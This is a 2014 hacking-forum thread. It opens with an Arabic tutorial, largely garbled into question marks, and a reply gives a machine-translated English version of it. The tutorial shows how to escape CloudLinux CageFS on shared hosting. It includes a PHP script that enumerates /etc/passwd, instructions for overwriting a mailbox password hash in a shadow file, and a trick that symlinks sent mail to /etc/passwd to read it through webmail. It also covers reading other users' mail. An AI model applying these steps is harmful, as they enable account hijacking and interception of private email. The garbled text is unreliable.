Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


CloudLinux CageFS Bypass & cPanel E-Mails Sniffing

  • 0 Vote(s) - 0 Average


06-29-2014, 08:31 AM #1
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
[CENTER]Smiley1?????? ????? ????? ???? ???????? [/CENTER]


[CENTER][Image: cloudlinux.jpg][/CENTER]





[CENTER]??? ??? ?????? ? ,, ????? ?? ??? ??? ?? ??? ????? ???????[/CENTER]

[CENTER]???? ???? ?? ??? ?????? ?? ???? ??? ?????? ??? ?????? ?? ???? ??????[/CENTER]

[CENTER]?? ??????? ????? ??? ??? ??? ???? ???? ???? ??????? ???? ????????? Smiley1[/CENTER]

[CENTER]?????? ??? #1 ?? ?????? :p[/CENTER]

[CENTER]??? ?? ?? CloudLinux ?[/CENTER]

[CENTER]?? ???? ???? ????? ??????? ??????? ????? ???? ?????? ??????? ?????? ?????? ?????? ???? ???????[/CENTER]

[CENTER]????? ?????? CloudLinux ?[/CENTER]

[CENTER]?????? ?????? ????????? ??????? ??? ??????? ?????? ???? ??????? ???? ?? ???? ????? [/CENTER]
[CENTER]???? ????? ???? ??????? ??????? ?????? ??? ??????? ????? ?????? ????? ???? ??? ??????? [/CENTER]


[CENTER]???? ???? ?? ????? ?????? [/CENTER]

[CENTER][Image: 840288_0.jpg][/CENTER]


[CENTER]??? ????? ?????? ?????? ???? ???? ???????? ???????? ?????? Public[/CENTER]

[CENTER]http://www.sec4ever.com/home/showthread.php?t=14423[/CENTER]

[CENTER]???? ??????[/CENTER]
[CENTER]http://pastebin.com/8ZeYnizw[/CENTER]

[CENTER]?????? ????? ?????? ?????? 100% ddd[/CENTER]

[CENTER]??? ???? ????? ???? ???? ?????? ???? ????? ??? ???????[/CENTER]

[CENTER]???? ???? ?? ?? ????? PHP - PERL - PYTHON - RUBY - C++ ??? ???? ??? ?? ???? ????? [/CENTER]

[CENTER]????? ??? ??? ??????? ?????? ?????? /etc/passwd ?? ???? ?? ?? ???????? ?? ??????? ?? ?? ??? ????? - ??? ????? - ?? ???? ?????? ???? PHP[/CENTER]

[CENTER]??? ??? ????? ?????? ??? /etc/passwd ???? ???? ?[/CENTER]

[CENTER]???? ?? ?????? ???? ???? [/CENTER]

[CENTER]???????? Cron Jobs[/CENTER]

[CENTER]?? ???? ??????? ?? ??? ????? ?????? ??? /etc/passwd[/CENTER]

[CENTER]??? ?????? ???? ?? ???? ?? ???? ???? ??? ?? ???? ??? Smiley1[/CENTER]

[CENTER]??? ???? ???? ????? ???? ?????? ??? CageFS ?[/CENTER]



[CENTER][Image: ma791272.gif][/CENTER]


[CENTER]???? ??? /etc/passwd[/CENTER]

[CENTER]???? ??? ??? ???? ????? ??? ????? ??? ???????? ??????? ??? ???? ????? ?? ????????? ???? ????[/CENTER]

[CENTER]?????[/CENTER]

[CENTER][Image: CX791334.gif][/CENTER]

[CENTER]???? ??? /home/user[/CENTER]

[CENTER]?? ????? ?????? ????? ???[/CENTER]

Code:
[CENTER].cagefs[/CENTER]
[CENTER].cl.selector[/CENTER]

[CENTER]???? ??????? ???? ??? CageFS[/CENTER]

[CENTER]????? ????? ??? ????? ??? ????? ????? ?? ??????? ??? Sniffing Emails [/CENTER]

[CENTER]???? ????????? ??? ??????? ???????? ??????? ?? ???? ????? ???[/CENTER]

[CENTER]?? ???? ?????? ????? ?? ???? ???? WEBMAIL[/CENTER]

[CENTER]http://ip:2095[/CENTER]

[CENTER]??? ??? ??? ????????? ???? ????[/CENTER]

Code:
[CENTER]/home/user/mail/new/[/CENTER]

[CENTER]??[/CENTER]

Code:
[CENTER]/home/user/mail/cur/[/CENTER]
[CENTER]???? ??? ??????? ????? ????? ??????? ???? ???? ???? ????? ??? ???? Smiley1[/CENTER]

[CENTER][Image: XCs91779.gif][/CENTER]

[CENTER]???? ???? ????????[/CENTER]

[CENTER][Image: 8xR91843.gif][/CENTER]


[CENTER]???? ???? ????? ??? ??????? ???? ???? ???? :p[/CENTER]

[CENTER]???? ???? ???? ???? ????????? ????? ????? CageFS[/CENTER]

[CENTER]??? ?? ???? ??????? ??? [/CENTER]

Code:
[CENTER]/home/user/etc/shadow[/CENTER]

[CENTER]??[/CENTER]

Code:
[CENTER]/home/user/etc/domain.tld/shadow[/CENTER]

[CENTER]??? ????? ??? ???[/CENTER]

[CENTER][Image: zJb92023.gif][/CENTER]

[CENTER]???? ???? ???? ??? ??????? ????? sec4ever.com[/CENTER]

[CENTER]??? ???????? ?? ????????? ?????? ??[/CENTER]

[CENTER]???? ??? ???? ????? ???????? ??? 123123 ???? ?? ???????[/CENTER]

Code:
[CENTER]$1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::[/CENTER]

[CENTER]???? ??? ????? info ????? ???[/CENTER]

Code:
[CENTER]info:$1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::[/CENTER]

[CENTER]???? ???? ?????? ??? [/CENTER]

[CENTER]http://domain.tld:2095[/CENTER]

[CENTER]?????? : [email protected][/CENTER]
[CENTER]??????? ???? ?????? ??? ??????[/CENTER]
[CENTER]???????? : 123123[/CENTER]

[CENTER][Image: cMa92296.gif][/CENTER]

[CENTER]???? ?? ??????[/CENTER]
[CENTER][Image: mqu92327.gif][/CENTER]

[CENTER]???? ????? ???????? RoundCube Smiley1[/CENTER]

[CENTER]????? ???? Compose [/CENTER]

[CENTER][Image: 2OY92621.gif][/CENTER]



[CENTER]???? ????? ?? ???? ?? ????[/CENTER]

[CENTER][Image: kV492668.gif][/CENTER]


[CENTER]??? ???? ??? Sent Mail ?? ????? ??????? ???? ??????? [/CENTER]

[CENTER][Image: iz992783.gif][/CENTER]

[CENTER]???? ???? ????? ???? ????? ???? ???????[/CENTER]


Code:
[CENTER]/home/greenlif/mail/domain.tld/usermail/.Sent/cur[/CENTER]

[CENTER]usemail : ???? ?? ??? info[/CENTER]

[CENTER][Image: ALp92950.gif][/CENTER]

[CENTER]???? ???? ????? ??? ????? ????? ?????? rm[/CENTER]

[CENTER]????? ???? ?????? /etc/passwd [/CENTER]

[CENTER]???? ??? ????? ??????[/CENTER]

[CENTER]????? ???????[/CENTER]

[CENTER][Image: ROn93033.gif][/CENTER]

[CENTER]?????? ??? ????? ???? ???? ??? /etc/passwd[/CENTER]

[CENTER]???? ???? ???????[/CENTER]

[CENTER]???? ???? ????? ????? Sent Mails[/CENTER]

[CENTER][Image: Xcj93190.gif][/CENTER]

[CENTER]?? ????? ???? ????? ?? ??? Subject ???? ???? No Subject[/CENTER]

[CENTER]???? ??? ??????? ???? ???? ?? ??? ??? /etc/passwd[/CENTER]

[CENTER]???? ???? ???? More [/CENTER]

[CENTER]????? ???? More - Download ( .xml ) [/CENTER]

[CENTER][Image: mG693258.gif][/CENTER]

[CENTER]???? ??? ???? ?????[/CENTER]

[CENTER][Image: qXd93318.gif][/CENTER]


[CENTER]???? ???? ?????? ?????? ????? ???? ??? ??????? ????? ?????[/CENTER]

[CENTER]?? ??? ???? ???? ????[/CENTER]

[CENTER][Image: ApE93428.gif][/CENTER]


[CENTER]???? ??????? ???? ???? ??? Horde[/CENTER]

[CENTER][Image: eZw93627.gif][/CENTER]

[CENTER]???? ??? ???? ?? ????? ??????? [/CENTER]

[CENTER][Image: Dl493661.gif][/CENTER]

[CENTER]??? ??? View Source[/CENTER]

[CENTER][Image: odO93694.gif][/CENTER]

[CENTER]?? ??????? ???? ?????? ?? ???????? Smiley1[/CENTER]

[CENTER]?? ?? ??? ???? ?????? ???????? ??? ??????? ?? ?????? ???[/CENTER]

[CENTER]????? ?????? ?????? ????? #1 ?? ?????? ?? ???? ???? ???? ??? ??? [/CENTER]

[CENTER]???? ?????? ?????? ??? :p ?????? ??????[/CENTER]

[CENTER]???? ?????? ?????? @b0x [/CENTER]

[CENTER]b0x[/CENTER]

06-29-2014, 08:34 AM #2
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
in english please and delete the [CENTER][/CENTER]

07-01-2014, 06:22 PM #3
DeathStr0keAG Offline I'm Back 😍😍😍 *****
MaDLeeTs LoVer
Posts:51 Threads:6 Joined:Jun 2014 Reputation: 0
Mood: Hacker
edit properly...

[Image: tumblr_l1monzDdxF1qav2vfo1_400.gif]

[Image: 2w4bc74.png]
Team MaDLeeTs


[#] CodeName: DeathStr0keAG
[#] Zone-H: www.zone-h.org/archive/notifier=DeathStr0keAG
[#] Email: [email protected]
[#] Website: www.DeathStr0keAG.tk



07-02-2014, 03:44 AM #4
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
very good b0x, But English Write Please Smiley1

jabber : [email protected]

07-04-2014, 10:00 PM #5
w40ut Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:14 Threads:1 Joined:Jun 2014 Reputation: 0
Mood: Hacker
Can't read that! Only in english! Sadsmiley

[Image: original.gif]

07-06-2014, 02:01 PM #6
Sn!p3r_GS Offline Super Moderator ******
Super Moderators
Posts:354 Threads:19 Joined:May 2013 Reputation: 1
Mood: Relaxed
copy paste from sec4ever Biggrinsmiley come on dude write in english Smiley1 btw smart ideas

Love & Respect to : Zombie_Ksa-H4x0rL1f3-Shadow008-b0x-1337-Invectus-??dcodE-DeXter -MakMan-MindCracker-Sniffer

08-29-2014, 09:58 AM #7
ewwink Offline Junior Member **
Registered
Posts:19 Threads:2 Joined:Aug 2014 Reputation: 1
Mood: None
I don't know what this is about Worriedsmiley but to read /etc/passwd you can easy do this using shell.

note: Google Translate

Peace, mercy and blessings of God


How is everyone? , Today is the first day of the holy month of Ramadan

I ask God in these days, to forgive us our sins and save us from the torment of the Fire

In the beginning of this lesson, I am not Msol before God and before you ways to use

Make sure that # 1 in the world

The first thing is CloudLinux?

The system is install it for your root server to the reserve accounts of the server as if they were separate accounts within the server

Why use CloudLinux?

Used to protect software and access to important files inside the server through the cage
The cage scans Information other sites on the server for the site appears like a single on the server


Now we begin the process of Skip

Before we begin the process of examining Skip Overrides published for the General Public

http://www.sec4ever.com/home/showthread.php?t=14423

Link tool
http://pastebin.com/8ZeYnizw
PHP Code:
<?php 
#Priv8 CageFS BYPASS
#By Br0keN
#/etc/passwd
?> 
<center>
<html dir="ltr"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<title>Priv8 CageFS Bypass</title> 
<style type="text/css" media="screen"> 
body { 
    font-size: 10px; 
    font-family: verdana; 

INPUT { 
    BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 

</style> 
</head> 
<body dir="ltr" alink="#D50428"  bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> 
<p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font>
<p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br>
<p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br>
etc/passwd/</b></font><br>
<?php 
error_reporting
(E_ALL E_NOTICE); 

    if (
function_exists('posix_getpwuid')) 
    { 
        if (isset(
$_POST['Br']) && isset($_POST['x0'])) 
        { 
            
$Br intval($_POST['Br']); 
            
$x0 intval($_POST['x0']); 
            while (
$Br $x0
            { 
                
$uid posix_getpwuid($Br); 
                if (
$uid
                { 
                    
$uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"
                    echo 
join(":",$uid)."<br>"
                } 
                
$Br++; 
            } 
        } else 
        { 
            echo 

            <form method="POST" action="?br0=x0">Uid   
            FROM : <input type="text" name="Br" value="1" size="4"> 
            TO : <input type="text" name="x0" value="1000" size="4"> 
            <input type="submit" name="Show" value="Show">'

        } 
    } else die(
"Error..! Posix Functions are disabled..!!!");
    die(); 
?>

You can try the tool and will fail 100%

Because the system is making the site the cage seems lonely on the server

This means that each Venkhn PHP - PERL - PYTHON - RUBY - C ++ will be part of what he wants the cage

If the intent was reverse connection and read / etc / passwd will not show you everything you Alauserat Sazarha is the lowest level - a programming language - or a tool written in PHP

So how I'm going to read the file /etc/passwd fully?

The solution is to resort to the Cpanel

And the use of Cron Jobs

Possible use or decompress the file and download the file /etc/passwd

But I will assume that I do not have CPanel and I have only a single shell

How do I know that I am surrounded by first the problem of the CageFS?
[Image: ma791272.gif]

Read the file /etc/passwd

Note that a small file size and does not contain the full Alauserat only Yoezer your Alauserat CPanel

Second
[Image: CX791334.gif]

Note the file /home/user

Suggested such a strange convergence of folders

Code:
.cagefs
.cl.selector

Now we have discovered the existence of the CageFS

Let's stop Shui and go to the other part of which is the subject Sniffing Emails

Now Turaslat are mailed letters to and from the server to another server

Using the tendency in the CIA program Panel WEBMAIL

Code:
http://ip:2095

Wi aftermarket are received within Trouh

Code:
/Home/user/mail/new/

Or

Code:
/Home/user/mail/cur/

You just read it and know the content of the message and you also adjust it as you like
[Image: XCs91779.gif]

Now we read it
[Image: 8xR91843.gif]

Heck Ntgess and appreciate the messages within the CPanel

Ok now we integrate the two subjects and we skip CageFS

The first thing we are going to

Code:
/Home/user/etc/shadow

Or

Code:
/home/user/etc/domain.tld/shadow

Mattel claimed the note Heck

[Image: zJb92023.gif]

Now we save the domain name but not sec4ever.com

These are emails Alauserat its own

Now we will change password to 123123 and this is Chwerth


Code:
$1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::

I mean the first change it to Emile info

Code:
info:$1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::

Now we keep and go to

http://domain.tld:2095

Filter Results: info sec4ever.com
Domain Negotiable change depending on the location
Password: 123123

[Image: cMa92296.gif]

Tamam Login

[Image: mqu92327.gif]
Now choose the program RoundCube

We work Compose
[Image: 2OY92621.gif]

And HLA choose any sender any mail

[Image: kV492668.gif]

Would you go and the note suggested Sent Mail message Elly Ketbnaha



Now we go Bcl Elly brighter for this track


Code:
Code:
/home/greenlif/mail/domain.tld/usermail/.Sent/cur

usemail: who here is info
[Image: ALp92950.gif]

Now we take this name and we deleted about it rm

We drag the shortcut /etc/passwd

This name is the same term
To become as follows
[Image: ROn93033.gif]
Noticed the same name became Usher on the /etc/passwd

Now go back to Email

We work update box Sent Mails
[Image: Xcj93190.gif]

Kpier note suggested change in the Subject now become the No Subject

As well as the size of the message became expresses the size of the file / etc/passwd

Ok now go and More

And go and check More - Download (.xml)
[Image: mG693258.gif]

Now after empty patience

[Image: qXd93318.gif]

As well as possible in a manner Skip Tanih press the message and enter them

Press the small arrow in it

[Image: ApE93428.gif]


In the same way as possible try to Horde

[Image: eZw93627.gif]

Now claimed you open a message window
[Image: Dl493661.gif]

The spirit of the View Source

[Image: odO93694.gif]

In the end downright Necessity is the mother of invention

What if you are forced to learn and use this method put forward what you

All rights reserved It is # 1 in the world what Vena skip explicit like this

This is only the first Skip Stay tuned for the next

All rights reserved b0x - protection Forever

b0x






Forum Jump:


Users browsing this thread:1 Guest(s)